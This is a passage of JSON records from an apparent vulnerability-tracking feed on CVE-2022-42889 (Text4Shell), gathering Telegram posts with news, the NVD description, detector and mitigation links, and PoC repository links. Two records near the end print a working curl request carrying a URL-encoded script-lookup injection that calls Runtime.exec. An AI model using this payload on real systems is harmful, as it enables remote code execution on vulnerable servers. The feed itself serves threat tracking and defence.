\u0443\u0436\u0435 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438\u00a0\u0432\u0437\u043b\u043e\u043c\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0441 40 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432.\n\n\u041f\u043e\u0434\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u0440\u0435\u0444\u0438\u043a\u0441 DNS \u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u044b \u0434\u043b\u044f \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u043a, \u0438 \u043d\u0435 \u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0439 \u0432\u0435\u0431-\u0441\u043a\u0430\u043d\u0435\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 Burp Suite \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u0434\u043b\u044f\u00a0\u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0432\u0440\u044f\u0434 \u043b\u0438 Text4Shell \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0442\u0430\u043a \u0436\u0435 \u0448\u0438\u0440\u043e\u043a\u043e, \u043a\u0430\u043a Log4Shell, \u043e\u0434\u043d\u0430\u043a\u043e \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0432\u044b\u0441\u043e\u043a\u0438\u0439 \u043f\u0440\u043e\u0444\u0438\u0446\u0438\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.", "creation_timestamp": "2022-10-21T17:20:03.000000Z"}, {"uuid": "9161a9d0-b450-41f7-b92a-249df1fa5175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/crackcodes/1258", "content": "CVE-2022-42889 (Text4Shell) OSS detector - Finds possibly vulnerable JAR files\nhttps://ift.tt/Fk7zU31\n\nSubmitted October 18, 2022 at 09:19PM by SRMish3\nvia reddit https://ift.tt/rfSNsdR", "creation_timestamp": "2022-11-06T10:53:15.000000Z"}, {"uuid": "85dbead2-f80b-4b5c-9bd8-87b08f4df155", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1257", "content": "CVE-2022-42889 PoC\n\nThis is Proof of Concept for the vulnerability CVE-2022-42889. This code will run the JavaScript code 195 + 324. If vulnerable the output should be: PoC Output: 519\n\nhttps://github.com/SeanWrightSec/CVE-2022-42889-PoC\n\nDetails:\nhttps://blogs.apache.org/security/entry/cve-2022-42889\n\n#cve #poc", "creation_timestamp": "2022-10-20T10:16:16.000000Z"}, {"uuid": "81935024-0593-49c6-bf11-5940c6dc7975", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/51631", "content": "\ud83d\udd74 Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text \ud83d\udd74\n\nThere's nothing yet to suggest CVE-2022-42889 is the next Log4j. But proof-of-concept code is available, and interest appears to be ticking up.\n\n\ud83d\udcd6 Read\n\nvia \"Dark Reading\".", "creation_timestamp": "2022-10-17T22:38:10.000000Z"}, {"uuid": "63c19af7-7806-4bfe-9be5-d40477778a7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/cibsecurity/51317", "content": "\u203c CVE-2022-42889 \u203c\n\nApache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-10-13T16:27:41.000000Z"}, {"uuid": "d9563d30-1cee-4c02-b15c-5aaaaf3611a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "exploited", "source": "https://t.me/information_security_channel/48784", "content": "Text4Shell Vulnerability Exploitation Attempts Started Soon After Disclosure\nhttps://www.securityweek.com/text4shell-vulnerability-exploitation-attempts-started-soon-after-disclosure\n\nExploitation attempts targeting the Apache Commons Text vulnerability tracked as CVE-2022-42889 and Text4Shell (https://www.securityweek.com/critical-apache-commons-text-flaw-compared-log4shell-not-widespread) started shortly after its disclosure, according to WordPress security company Defiant.\nread more (https://www.securityweek.com/text4shell-vulnerability-exploitation-attempts-started-soon-after-disclosure)", "creation_timestamp": "2022-10-21T16:10:01.000000Z"}, {"uuid": "6579a8a7-1c11-4f05-98b3-6c51301ed02a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "exploited", "source": "https://t.me/xakep_ru/13097", "content": "\u0421\u0432\u0435\u0436\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Commons Text \u0443\u0436\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u0445\u0430\u043a\u0435\u0440\u044b\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Defiant, \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e WordPress, \u0443\u0436\u0435 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u044b \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Apache Commons Text (CVE-2022-42889). \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0441\u0447\u0438\u0442\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Text4Shell \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u0441 1.5 \u043f\u043e 1.9, \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u0430\u0442\u044c \u043d\u043e\u0432\u043e\u0439 Log4Shell. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 9,8 \u0431\u0430\u043b\u043b\u0430 \u0438\u0437 10 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0445 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 \u043e\u0446\u0435\u043d\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CVSS.\n\nhttps://xakep.ru/2022/10/21/text4shell/", "creation_timestamp": "2022-10-21T20:45:19.000000Z"}, {"uuid": "079cdcf5-6869-4ecc-80a3-6f6764d4a478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "exploited", "source": "https://t.me/thehackernews/2686", "content": "Researchers have detected active exploitation attempts targeting the recently disclosed critical RCE vulnerability (CVE-2022-42889) in Apache Commons Text.\n\nRead details: https://thehackernews.com/2022/10/hackers-started-exploiting-critical.html", "creation_timestamp": "2022-10-21T13:05:33.000000Z"}, {"uuid": "f840342f-68e0-475a-b4f7-ab4d215e97b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7110", "content": "#tools\n#Blue_Team_Techniques\n1. A python script developed to process Windows memory images based on triage type\nhttps://github.com/CrowdStrike/SuperMem\n2. Script to handle CVE 2022-42889: removing the older version of Apache Commons Text 1.9 and replaces it with the newer version (1.10.0) in\u00a0JMETER_HOME/lib\u00a0folder\nhttps://github.com/QAInsights/cve-2022-42889-jmeter\n3. Powershell Exploit detection for Windows\nhttps://github.com/jake-k-38/win-ioc-detect", "creation_timestamp": "2022-11-06T13:27:02.000000Z"}, {"uuid": "52dbdc38-6575-45e9-bf5d-0d886c566227", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2446", "content": "#CVE-2022\n\nProof of Concept for CVE-2022-42889 (Text4Shell Vulnerability) \n\nhttps://github.com/cryxnet/CVE-2022-42889-RCE\n\n@BlueRedTeam", "creation_timestamp": "2022-11-12T18:15:59.000000Z"}, {"uuid": "b3b31f02-0a75-4ba7-a996-31175f3b2aec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2471", "content": "#CVE-2022\nProof of Concept for CVE-2022-42889 (Text4Shell Vulnerability) \n\nhttps://github.com/cryxnet/CVE-2022-42889-RCE\n\n@BlueRedTeam", "creation_timestamp": "2022-11-19T04:54:28.000000Z"}, {"uuid": "34ce8eb1-4d29-4d6f-a41c-91df430c2334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/6606", "content": "Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell\n\nhttps://sysdig.com/blog/cve-2022-42889-text4shell/", "creation_timestamp": "2022-10-21T17:35:22.000000Z"}, {"uuid": "c82290e6-b9c7-4bf2-b87c-bbd9401556e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7000", "content": "#exploit\n1. Post-Exploitation script to exfiltrate 7-zip files\nhttps://github.com/Qeisi/7-ZipPostExp\n\n2. CVE-2022-42889:\nText4Shell - RCE in Apache Commons Text software\nhttps://cyberwatch.fr/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text", "creation_timestamp": "2022-10-18T11:01:01.000000Z"}, {"uuid": "fcab6332-cd29-4a36-a45e-bcd8cf42e017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4218", "content": "CVE-2022-42889\n\nApache Text4Shell \n\ncurl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2067\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2022-11-12T16:31:58.000000Z"}, {"uuid": "b042336a-6280-4552-bc48-c1802099c2d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/club31337/1241", "content": "#Apache Text4Shell (CVE-2022-42889)\n\nPoC\ncurl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D\n\nhttps://sysdig.com/blog/cve-2022-42889-text4shell/\n\nhttps://github.com/ClickCyber/cve-2022-42889", "creation_timestamp": "2024-11-09T21:05:43.000000Z"}]}